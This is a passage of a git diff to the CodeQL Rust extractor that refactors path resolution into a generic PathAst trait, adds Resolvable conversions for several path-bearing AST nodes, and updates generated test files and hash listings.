rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.expected rename rust/ql/test/extractor-tests/generated/Path/{Path_getResolvedCrateOrigin.ql => PathPat_getResolvedCrateOrigin.ql} (91%) create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.expected rename rust/ql/test/extractor-tests/generated/Path/{Path_getResolvedPath.ql => PathPat_getResolvedPath.ql} (91%) delete mode 100644 rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected delete mode 100644 rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql diff --git a/rust/extractor/src/generated/.generated.list b/rust/extractor/src/generated/.generated.list index ec1f2815442..8ca2c6931b1 100644 --- a/rust/extractor/src/generated/.generated.list +++ b/rust/extractor/src/generated/.generated.list @@ -1,2 +1,2 @@ mod.rs 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 -top.rs 272ecf2f56f35211d2449dbf55b1907d8414a8e4cceded03fd12f6f599852c73 272ecf2f56f35211d2449dbf55b1907d8414a8e4cceded03fd12f6f599852c73 +top.rs 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 diff --git a/rust/extractor/src/generated/top.rs b/rust/extractor/src/generated/top.rs index 73048514fda..8cdec4c9b9f 100644 --- a/rust/extractor/src/generated/top.rs +++ b/rust/extractor/src/generated/top.rs @@ -1671,6 +1671,60 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct Path { + pub id: trap::TrapId, + pub qualifier: Option>, + pub part: Option>, +} + +impl trap::TrapEntry for Path { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("paths", vec![id.into()]); + if let Some(v) = self.qualifier { + out.add_tuple("path_qualifiers", vec![id.into(), v.into()]); + } + if let Some(v) = self.part { + out.add_tuple("path_parts", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for Path { + fn class_name() -> &'static str { "Path" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme Path is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme Path is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme Path is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathSegment { pub id: trap::TrapId, @@ -6001,69 +6055,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct Path { - pub id: trap::TrapId, - pub qualifier: Option>, - pub part: Option>, -} - -impl trap::TrapEntry for Path { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("paths", vec![id.into()]); - if let Some(v) = self.qualifier { - out.add_tuple("path_qualifiers", vec![id.into(), v.into()]); - } - if let Some(v) = self.part { - out.add_tuple("path_parts", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for Path { - fn class_name() -> &'static str { "Path" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct PathExprBase { _unused: () @@ -6109,6 +6100,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathExprBase is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathPat { pub id: trap::TrapId, @@ -6168,6 +6168,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathType { pub id: trap::TrapId, @@ -6562,6 +6571,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct RecordFieldList { pub id: trap::TrapId, @@ -6684,6 +6702,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct RefExpr { pub id: trap::TrapId, @@ -7511,6 +7538,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct TupleType { pub id: trap::TrapId, @@ -9444,6 +9480,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathExpr is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct Static { pub id: trap::TrapId, diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index 003c86919b6..65b64a8b0b7 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs @@ -1,4 +1,4 @@ -use super::mappings::{AddressableAst, AddressableHir}; +use super::mappings::{AddressableAst, AddressableHir, PathAst}; use crate::generated::MacroCall; use crate::generated::{self}; use crate::rust_analyzer::FileSemanticInformation; @@ -53,8 +53,20 @@ macro_rules! emit_detached { $self.extract_canonical_origin_of_enum_variant(&$node, $label); }; // TODO canonical origin of other items - (Path, $self:ident, $node:ident, $label:ident) => { - $self.extract_canonical_destination(&$node, $label); + (PathExpr, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (RecordExpr, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (PathPat, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (RecordPat, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (TupleStructPat, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); }; (MethodCallExpr, $self:ident, $node:ident, $label:ident) => { $self.extract_method_canonical_destination(&$node, $label); @@ -506,25 +518,22 @@ impl<'a> Translator<'a> { })(); } - pub(crate) fn extract_canonical_destination( + pub(crate) fn extract_path_canonical_destination( &mut self, - item: &ast::Path, - label: Label, + item: &impl PathAst, + label: Label, ) { (|| { + let path = item.path()?; let sema = self.semantics.as_ref()?; - let resolution = sema.resolve_path(item)?; + let resolution = sema.resolve_path(&path)?; let PathResolution::Def(def) = resolution else { return None; }; let origin = self.origin_from_module_def(def)?; let path = self.canonical_path_from_module_def(def)?; - generated::Resolvable::emit_resolved_crate_origin( - label.into(), - origin, - &mut self.trap.writer, - ); - generated::Resolvable::emit_resolved_path(label.into(), path, &mut self.trap.writer); + generated::Resolvable::emit_resolved_crate_origin(label, origin, &mut self.trap.writer); + generated::Resolvable::emit_resolved_path(label, path, &mut self.trap.writer); Some(()) })(); } diff --git a/rust/extractor/src/translate/mappings.rs b/rust/extractor/src/translate/mappings.rs index 885055a6017..6ad8a7d1df6 100644 --- a/rust/extractor/src/translate/mappings.rs +++ b/rust/extractor/src/translate/mappings.rs @@ -170,3 +170,37 @@ impl AddressableAst for ast::Union { impl AddressableAst for ast::Module { type Hir = Module; } + +pub trait PathAst: AstNode { + fn path(&self) -> Option; +} + +impl PathAst for ast::PathExpr { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::RecordExpr { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::PathPat { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::RecordPat { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::TupleStructPat { + fn path(&self) -> Option { + self.path() + } +} diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index b0c71e3ef01..dff9541b449 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -101,29 +101,29 @@ lib/codeql/rust/elements/ParenExpr.qll b635f0e5d300cd9cf3651cfcefd58316c21727295 lib/codeql/rust/elements/ParenPat.qll 40d033de6c85ad042223e0da80479adebab35494396ab652da85d3497e435c5a 8f2febe5d5cefcb076d201ae9607d403b9cfe8169d2f4b71d13868e0af43dc25 lib/codeql/rust/elements/ParenType.qll e1f5695b143c97b98ccdb460a5cf872461cfc13b83a4f005f26c288dc0afae10 1164f8efae7f255925411bddb33939fab0bf1c07955a16fef173b3f4675d09ae lib/codeql/rust/elements/Pat.qll 56211c5cb4709e7c12a2bfd2da5e413a451672d99e23a8386c08ad0b999fd45c b1b1893a13a75c4f0390f7e2a14ee98a46f067cfdc991a8d43adc82497d20aff -lib/codeql/rust/elements/Path.qll 94869df09b929c4a60bae42b7e3a66c007f41078c08b7d9c6defb705b953ce8e eb317f75b89978d41fd3b166c7e3d871da4c04b3e17afbbcd0a5d73881e0d1d9 +lib/codeql/rust/elements/Path.qll 16264a9c978a3027f623530e386a9ad16541305b252fed5e1bedcfbe1d6475d5 8c21063c7f344ce686342e7c12542fec05004e364681f7a31b65f5ee9263a46d lib/codeql/rust/elements/PathExpr.qll 906df1d80c662b79f1b0b0428c39754b7f8dbcb2234919dd45dd8206a099dd36 1d6015afab6378c926c5838c9a5772cfcfeedf474e2eeca3e46085300ff8d4e1 -lib/codeql/rust/elements/PathExprBase.qll bb41092ec690ae926e3233c215dcaf1fd8e161b8a6955151949f492e02dba13a b2257072f8062d31c29c63ee1311b07e0d2eb37075f582cfc76bb542ef773198 -lib/codeql/rust/elements/PathPat.qll 6897e69bcb24b56d39ede796cf5767988dcd5741e02333fa8495dd7c814f771a 2a011fb92f17e4b4ff713e6d29f591054dfede22a9aaa006e67fca2c23ab76bf +lib/codeql/rust/elements/PathExprBase.qll db8702a2e2cec7c1daaad38649c27b657759103ca451dfa9d34b9be873fdc0af d770e983fb55e06f3fcee6b7511cf5d4ed4c4f6a18d8b1d1f14553cdbe8666df +lib/codeql/rust/elements/PathPat.qll 9d0b29b964bfe3a90af4c9930868a3d2046d2210a1575f9b9af84f6fd3fccbab 21748a5bd01d5531c846e6b7c1cc9fddf4adc0c959843e668df200a2490a5f94 lib/codeql/rust/elements/PathSegment.qll 9560551cf8b65e84705e7f302e12b48330e048613129e87c0f65a7eb297a6cc3 3aa75a5fd81f8ea32bd2b4bf0c51c386de57cbe9ab035fe3ec68ad7fcf51b375 lib/codeql/rust/elements/PathType.qll 257ede178bb74ebdb8e266ebaa95082e7fb7cc8d921ef476f4df268ee8a1366c c48f6e04a8945a11f965e71819f68c00abc53a055042882b61716feda3ca63ae lib/codeql/rust/elements/PrefixExpr.qll 107e7bd111b637fd6d76026062d54c2780760b965f172ef119c50dd0714a377d 46954a9404e561c51682395729daac3bda5442113f29839d043e9605d63f7f6d lib/codeql/rust/elements/PtrType.qll b137f47a53e41b3b30c7d80dbdd6724bf15f99530ca40cc264a04af5f07aa878 b2ffdf739bfb7564d942fe54409834a59511c0b305b6d5b2219a8ee0ef594332 lib/codeql/rust/elements/RangeExpr.qll 43785bea08a6a537010db1138e68ae92eed7e481744188dfb3bad119425ff740 5e81cfbdf4617372a73d662a248a0b380c1f40988a5daefb7f00057cae10d3d4 lib/codeql/rust/elements/RangePat.qll b5c0cfc84b8a767d58593fa7102dcf4be3ff8b02ba2f5360c384fa8af4aac830 cc28399dd99630bfa50c54e641a3833abe6643137d010a0a25749d1d70e8c911 -lib/codeql/rust/elements/RecordExpr.qll eb402960c5c6a14d0a0ffebd61a352b59b5d1cc1c2531cacd54754310a812d77 415c93384e63cf38003dde987715554ebf45fc32ba03bc5fd78b8d2501812de1 +lib/codeql/rust/elements/RecordExpr.qll d368aaf18319c0560c04d0438caf64b3b7aad3aa0cf4bbb643bfbb58d6d71091 44323e15b5a6fab187e846abe9cb530c6472ed673993c5e3679279b1286792da lib/codeql/rust/elements/RecordExprField.qll edac04146849e2aeca27e7bbb896c21aa2e2b15736b1e8a06ac51ab01433b3ac 7c062bd6d5dd5b1d972450fb0b3272cd9b45f94ccd668c3bd4347e2dce3279ed lib/codeql/rust/elements/RecordExprFieldList.qll 672c3854cb84090c8a2e9311c43448016dc2614ecbf86dbe404156304674e38f 01ae0ffca0bf640c61120e36fcf2c560555f4aabbd49ddce6f5c1a3561dbfc31 lib/codeql/rust/elements/RecordField.qll 9c462033cc889756876cb3d2a07e4f0d9a67064cf188cdd68e08ab21e5edc459 437254bbf6537f1a575ae344c2e23ffad7138776db8f7ebf90026c13886a2638 lib/codeql/rust/elements/RecordFieldList.qll cebab3fba41221e61cda801070a7f414b62b4fbcf2206e35462c0da35ad75c3f db092d47eea871d61541b9711d7139a99394e0ed83901a8ae60f03dfa8ed722f -lib/codeql/rust/elements/RecordPat.qll a210d700e710107100fedad1098fb789056a0c0b8dbc11de2b242877e692ec20 3efa12d7bfa0da7c09a42b2b43c50ff3985c55676db7f3be2c771765d81f9a10 +lib/codeql/rust/elements/RecordPat.qll bb21f25373afd03232f8e2977134b6a10ac525f0bd654bbf95713b964b99ba0f 28313e566c86d09ae3b60df538a3c7561f73c02b8ac93eaa5ff9914b2c9b241c lib/codeql/rust/elements/RecordPatField.qll 7487461887e82bcf224b02628dfc64457121ab17e731e2dc7aa7e731ab16c02f f2018e55722245eb4273fb067242aaa503c43f91671a55b3a4bb51fe7bc0a03c lib/codeql/rust/elements/RecordPatFieldList.qll c3198c997f389ce95db377ca40ac69a1448f120093f37ab1c92a5a3f1f6aa0d4 9db36d274f1ec77c442ae7e38f940a65c9a92f1541f66140188b226965851535 lib/codeql/rust/elements/RefExpr.qll 91a0d3a86002289dc01ffbe8daca13e34e92e522fbb508241a9d51faf1d4a9d2 b6e63d8e6f8956d2501706d129a6f5f24b410ea6539839757c76ba950c410582 lib/codeql/rust/elements/RefPat.qll fe076bdccb454111b38f360837d180274ba8a003b4cffe910b5197cd74188089 2604c8bb2b0b47091d5fc4aa276de46fe3561e346bd98f291c3783cef402ba06 lib/codeql/rust/elements/RefType.qll 5dc6012188d5baf36cd7bf0ebc127e28e98862a3f91ea4df2f9b9c962f3a395d ddb06ebe7fb92ad7bbe86cf182270e8494b74edf91b8c841aaf7ba932e5092ac lib/codeql/rust/elements/Rename.qll 55fa06145f2160304caac0a5ce4cf6a496e41adfd66f44b3c0a1d23229ed8ce0 80262f0abf61749cdf0d5701637db359960f5404ad1dbfdd90f5048d2e7c315d -lib/codeql/rust/elements/Resolvable.qll 213c0c157541002ddd61cc76cdc11386819aa59dff0a81780474cccb6b7fb211 cdcf807587f887493888341a1b6f9bed202b80b37cacc77041a256b05ff4d3d1 +lib/codeql/rust/elements/Resolvable.qll 550d516d55b2c10e6e2afd0b9df7434448405ac8a84c4ded8b56fa1173612d32 0b59f31f411a14dd4eb0fe9df5483e4a00501a480bde6db9e6a499b9c0a57184 lib/codeql/rust/elements/RestPat.qll a898a2c396f974a52424efbc8168174416ac6ed30f90d57c81646d2c08455794 db635ead3fa236e45bbd9955c714ff0abb1e57e1ce80d99dc5bb13438475adbf lib/codeql/rust/elements/RetType.qll 36ea39240a56c504d94d5487ea9679563eef3dfe0e23bf42d992d1ab2b883518 2fe5b6f62a634c6aa30a1ecd620f3446c167669cf1285c8ef8dd5e5a6ef5fc71 lib/codeql/rust/elements/ReturnExpr.qll b87187cff55bc33c8c18558c9b88617179183d1341b322c1cab35ba07167bbdb 892f3a9df2187e745c869e67f33c228ee42754bc9e4f8f4c1718472eb8f8c80f @@ -145,7 +145,7 @@ lib/codeql/rust/elements/TupleExpr.qll 561486554f0c397bc37c87894c56507771174bfb2 lib/codeql/rust/elements/TupleField.qll e58d024fc41519b559eef36cf6081d03a786b05357e4322e7046092131ea508f cad861b23fb4cdf2fbe90595de0e4776f1db9b69c3f3825221e475bc92895351 lib/codeql/rust/elements/TupleFieldList.qll 73397eef1cf8c18286b8f5bb12fbdc9bb75eee3b7bd64d149892952b79e498a3 13ac90f466ab22e5750af9e44aff9605b9e16f8350b4eaecff6a99e83d154e25 lib/codeql/rust/elements/TuplePat.qll 028cdea43868b0fdd2fc4c31ff25b6bbb40813e8aaccf72186051a280db7632e 38c56187971671e6a9dd0c6ccccb2ee4470aa82852110c6b89884496eb4abc64 -lib/codeql/rust/elements/TupleStructPat.qll 16a3f10992db62cc6630dc962a2a0d243c41b8aca064d6cb6c82a2f4e6987a12 c2b4c14567ee2dd65e0b643c9d18dfe5098fb3bd4ed45dcc825065bfa7c7c02d +lib/codeql/rust/elements/TupleStructPat.qll 743022ff471131aa58cd8ff131eef1568400da0ddefa5dbab1609a7ce00797d7 c6ddf777c3ee3a0f4d55c42f3af6a01e190a1e8892237c6e85c9ae65c84e39f3 lib/codeql/rust/elements/TupleType.qll b5c798f7c9b08c8a6cc0a57fc5c36d714e70d5e955a9e87b6b309c18365d7596 ebea533ab126392344d080da1bc9efabcabb5397e93c9d213ffc71a61bb8d47c lib/codeql/rust/elements/TypeAlias.qll 64780697f5869266345d040fdaee05c62b8670b9b5c6369692f9a9dc646986fc afcc7617d0e2e16d92d2a53c3e6661fd184bf5cf21b154f121dbf4d3b7ab30e6 lib/codeql/rust/elements/TypeArg.qll 39aea9a9f0b74e8b90e957dbc3ce593cbdb1d2e0d9320428ce2e9cbfcb772e53 f1f2612633de9f534faf76c368b6154a8dc20feb9297262fcb10a8f192aa2e02 @@ -370,7 +370,6 @@ lib/codeql/rust/elements/internal/TupleFieldListImpl.qll ec17ddfe1d03210b7737f9c lib/codeql/rust/elements/internal/TuplePatConstructor.qll 2a5e83ad5b8713a732e610128aeddf14e9b344402d6cf30ff0b43aa39e838418 6d467f7141307523994f03ed7b8e8b1a5bcf860963c9934b90e54582ea38096a lib/codeql/rust/elements/internal/TuplePatImpl.qll 4adb38f0f8dae4ff285b9f5843efb92af419719a7549e0ff62dc56969bd3c852 3f622130771d7731ed053175a83b289bab1d1f5931526c4854923dbcec7e43f1 lib/codeql/rust/elements/internal/TupleStructPatConstructor.qll 9d68f67a17a5cec0e78907a53eccfa7696be5b0571da4b486c8184274e56344a 3ffa29f546cd6c644be4fecc7415477a3a4dc00d69b8764be9119abe4c6d8b9e -lib/codeql/rust/elements/internal/TupleStructPatImpl.qll 896f001d82938bd018516a2b59ba5ad76350edb6b9747ed2ef5b96760aa16388 0552f9c0361d14be9896cbcfda17d8884d03a82c4f23c511a8de77fe71cfbb9f lib/codeql/rust/elements/internal/TupleTypeConstructor.qll 88eaec829cd4dcc6a152c7a335b1d365702ef410e46d9c04806fe53f06325b23 044fd0aca067bae82eb8ac448b7bcc66bc736e7e0ab8b770ee126381888fac3d lib/codeql/rust/elements/internal/TupleTypeImpl.qll 4d570a1d6c3d69d8f62f125c71f67dd90e982801905716d50292f2e652156948 1dcefae60448b21f85d46d252e314d67a9f2a90171e56351e08e2bc0a4077fb8 lib/codeql/rust/elements/internal/TypeAliasConstructor.qll 048caa79eb7d400971e3e6d7e580867cbee4bd6b9d291aafac423aa96c321e76 d1d1e33a789ae6fa1a96af4d23d6376b9d82e14e3cbb777963e2d2cb8b22f66d @@ -512,12 +511,12 @@ lib/codeql/rust/elements/internal/generated/ParamList.qll c808c9d84dd7800573832b lib/codeql/rust/elements/internal/generated/ParenExpr.qll bc0731505bfe88516205ec360582a4222d2681d11342c93e15258590ddee82f2 d4bd6e0c80cf1d63746c88d4bcb3a01d4c75732e5da09e3ebd9437ced227fb60 lib/codeql/rust/elements/internal/generated/ParenPat.qll ce24b8f8ecbf0f204af200317405724063887257460c80cf250c39b2fdf37185 e7c87d37e1a0ca7ea03840017e1aa9ddb7f927f1f3b6396c0305b46aeee33db6 lib/codeql/rust/elements/internal/generated/ParenType.qll 9cc954d73f8330dcac7b475f97748b63af5c8766dee9d2f2872c0a7e4c903537 c07534c8a9c683c4a9b11d490095647e420de0a0bfc23273eaf6f31b00244273 -lib/codeql/rust/elements/internal/generated/ParentChild.qll db7a782f11a14305acc666c865118475e2d324d2bf5d4110b157e1d488b62b75 3b5d31528d0baa0ceee139097e93461d18503797a1507288dc43428f378500e2 +lib/codeql/rust/elements/internal/generated/ParentChild.qll 03c1d8e0c0d0f7e34164f6ede37bdc744790fa25b252b5b34b006c48735daef6 7675198b227e5cb357cabe6a7622f461103e3829c0135560b37013c2a914edb2 lib/codeql/rust/elements/internal/generated/Pat.qll 3605ac062be2f294ee73336e9669027b8b655f4ad55660e1eab35266275154ee 7f9400db2884d336dd1d21df2a8093759c2a110be9bf6482ce8e80ae0fd74ed4 -lib/codeql/rust/elements/internal/generated/Path.qll 4c1c8e840ed57880e574142b081b11d7a7428a009f10e3aa8f4645e211f6b2e0 989668cf0f1bdee7557e2f97c01e41d2a56848227fed41477833f5fc1e1d35f6 +lib/codeql/rust/elements/internal/generated/Path.qll bf6a86e7fcb7164624cc070dcce86d2bda50a2516b95115b87d0ebb5596e50a1 fd7a9ad4034cdebe8dfe495619c46f464630d38195313072e0bd904061b0fb00 lib/codeql/rust/elements/internal/generated/PathExpr.qll 2096e3c1db22ee488a761690adabfc9cfdea501c99f7c5d96c0019cb113fc506 54245ce0449c4e263173213df01e079d5168a758503a5dbd61b25ad35a311140 -lib/codeql/rust/elements/internal/generated/PathExprBase.qll d8218e201b8557fa6d9ca2c30b764e5ad9a04a2e4fb695cc7219bbd7636a6ac2 4ef178426d7095a156f4f8c459b4d16f63abc64336cb50a6cf883a5f7ee09113 -lib/codeql/rust/elements/internal/generated/PathPat.qll 98c9938d6a359fd717829b196eb09701d2c798e18c1f43fa7b2a9145afdf6c19 caba2e629cae08682baac90a76ae9a48cda2d7d6f9c23d506fa0ff3f292978a4 +lib/codeql/rust/elements/internal/generated/PathExprBase.qll 696f580d56804c000983cd839671f0d0d573a9d3dbb151f500e4fe3bf900320b ebae99d1541e0d4e519599b2c5e4d734c20b7ed7ba1dbe1772f59ad7bb2c9f0f +lib/codeql/rust/elements/internal/generated/PathPat.qll 551864a9ba7d60b5662044578f0e12e6995c71710d75d8955eec2d7ab52e4d44 fedd7249e7f00229aa8632154fce2c6f1a37e017f9d4d53a5d309ba40e0c22a5 lib/codeql/rust/elements/internal/generated/PathSegment.qll 0fa07886deb0fc4d909d7edf691238a344f2739900aafb168cbac171eb1729a8 8f4bb418d8bea5e40128a87977c57d0a9183d06d111601ad93130c8615c11465 lib/codeql/rust/elements/internal/generated/PathType.qll df6fd322ba0d99d6cb315edce8dbf099b661b84fdfcc3ad629fdd1fd066c1986 e11c8615cd7b02034b47b58f30a7b6fcbc6d33ec53303288dfd34d9a25f5a186 lib/codeql/rust/elements/internal/generated/PrefixExpr.qll c9ede5f2deb7b41bc8240969e8554f645057018fe96e7e9ad9c2924c8b14722b 5ae2e3c3dc8fa73e7026ef6534185afa6b0b5051804435d8b741dd3640c864e1 @@ -525,20 +524,20 @@ lib/codeql/rust/elements/internal/generated/PtrType.qll 40099c5a4041314b66932dfd lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll ea294a3ba33fd1bc632046c4fedbcb84dcb961a8e4599969d65893b19d90e590 ea294a3ba33fd1bc632046c4fedbcb84dcb961a8e4599969d65893b19d90e590 lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll efd93730de217cf50dcba5875595263a5eadf9f7e4e1272401342a094d158614 229b251b3d118932e31e78ac4dfb75f48b766f240f20d436062785606d44467b -lib/codeql/rust/elements/internal/generated/Raw.qll 7de290d66bd594f4c5b5a296502792e803e9f1084bb2616d9774196e33b16c87 28150fdd3cff3bb49b407f0c2119602be13e78cbb1f8fd749edd31f5d9772f7a -lib/codeql/rust/elements/internal/generated/RecordExpr.qll eb6cb662e463f9260efae1a6ce874fa781172063b916ef1963f861e9942d308d 1a21cbccc8f3799ff13281e822818ebfb21d81591720a427cac3625512cb9d40 +lib/codeql/rust/elements/internal/generated/Raw.qll b6bfb4c58f879143b78546b9a1f657876a245facdd01f7dd944825ca9dcf3464 867f32b72030b2b234f818e07b55abc3a3b516c91162dda736b8bc761c16afd6 +lib/codeql/rust/elements/internal/generated/RecordExpr.qll 57a25e78a1e501fa6e2876b8412056fb9a50fed79645542e420789333049335e 5f3692fe36d3590ddbb4b6228adf17528a0ab91057940bd9faac000ae735bec1 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 lib/codeql/rust/elements/internal/generated/RecordField.qll 9f7840e1a2a194d5ed1d5201ab483eb01129849d49392581e0328bbc0934305c 0e019b5b8fe91bc96c7c07933c766d8a09c066d48ed96f24ae3dad303c00585e lib/codeql/rust/elements/internal/generated/RecordFieldList.qll d7bb2677338cf420b0d6371aeec781aacc2272c73413ea96b7418177ad149fb9 5ef52074b9f4ec31e7422b70efdb2e650d673b2625efdfec18a4e48c30e35cf6 -lib/codeql/rust/elements/internal/generated/RecordPat.qll f5f9904fcd8b8fa5fe65b46a68f830021a5e4a68f95ff403151565c3ec770477 56294ed2ff753d8be7742a501b15b5f3f5f20afe0f8171ee6771d049f26489e4 +lib/codeql/rust/elements/internal/generated/RecordPat.qll 0431a89f30da9dff98b850998d58fcf4d7b475f503e9a9eddf3576965514d22a eb06e4b716f6bc4aed962d609a08679a336cfd375fbd34b2c9fce3f4642ed385 lib/codeql/rust/elements/internal/generated/RecordPatField.qll f17b1aa265091fd8309fd90d5c3822d170870e304f160225327de5a844a9aed4 0458e39dbe88060b4b664692cf0b41ebf4364de268d9417658c14c883c9c1b33 lib/codeql/rust/elements/internal/generated/RecordPatFieldList.qll 08d4740bbb519f15ab20b694b3c45e396a2a59cce0f68fa4b9698348784cae43 99919809607ae61c707f591ee609c50bcfb90d5b4f9c263f6b8e78658d21b605 lib/codeql/rust/elements/internal/generated/RefExpr.qll 7d995884e3dc1c25fc719f5d7253179344d63650e217e9ff6530285fe7a57f64 f2c3c12551deea4964b66553fb9b6423ee16fec53bd63db4796191aa60dc6c66 lib/codeql/rust/elements/internal/generated/RefPat.qll 5c4d908f851d89f42cf765007c46ac4199200f9b997f368d5b0e2a435efa82cd 42fd637bc98b5a9275386f1c5fb3ae8c4681987289a89b060991416a25131306 lib/codeql/rust/elements/internal/generated/RefType.qll 3603a3e000acc25c5e675bd4bc4a5551b8f63851591e1e9247709e48d1769dc5 